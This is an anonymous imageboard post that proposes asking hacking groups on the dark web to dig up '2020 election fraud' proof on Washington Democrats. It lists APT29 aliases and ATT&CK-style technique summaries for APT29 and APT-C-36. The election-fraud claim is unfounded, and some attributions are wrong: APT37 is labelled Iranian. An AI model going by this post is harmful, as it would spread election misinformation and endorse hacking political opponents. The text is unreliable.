Anonymous ID: 65d796 Aug. 9, 2022, 4:22 a.m. No.17317307   🗄️.is 🔗kun

If I post a DarkWeb request for the best international hacking groups in the world to reveal corrupted Washington DC democrats 2020 election fraud participation proof I think some damning evidence would be revealed…

 

Hacker Groups:

 

APT29 and Associated Groups:

 

IRON RITUAL

IRON HEMLOCK

NobleBaron

Dark Halo

StellarParticle

NOBELIUM

UNC2452

YTTRIUM

The Dukes

Cozy Bear

CozyDuke

 

APT29 used 7-Zip to compress stolen emails into password-protected archives prior to exfiltration.

 

APT29 added their own devices as allowed IDs for active sync using Set-CASMailbox, allowing it to obtain copies of victim mailboxes. It also added additional permissions (such as Mail.Read and Mail.ReadWrite) to compromised Application or Service Principals.

 

APT29 has used encoded PowerShell scripts uploaded to CozyCar installations to download and install SeaDuke. APT29 also used PowerShell to create new tasks on remote machines, identify configuration settings, evade defenses, exfiltrate data, and to execute other commands.

 

North Korean Government Group:

InkySquid

 

Iranian Government Group:

APT37

 

APT-C-36

 

APT-C-36 is a suspected South America espionage group that has been active since at least 2018. The group mainly targets Colombian government institutions as well as important corporations in the financial sector, petroleum industry, and professional manufacturing.

 

APT-C-36 has embedded a VBScript within a malicious Word document which is executed upon the document opening.

 

APT-C-36 has used ConfuserEx to obfuscate its variant of Imminent Monitor, compressed payload and RAT packages, and password protected encrypted email attachments to avoid detection.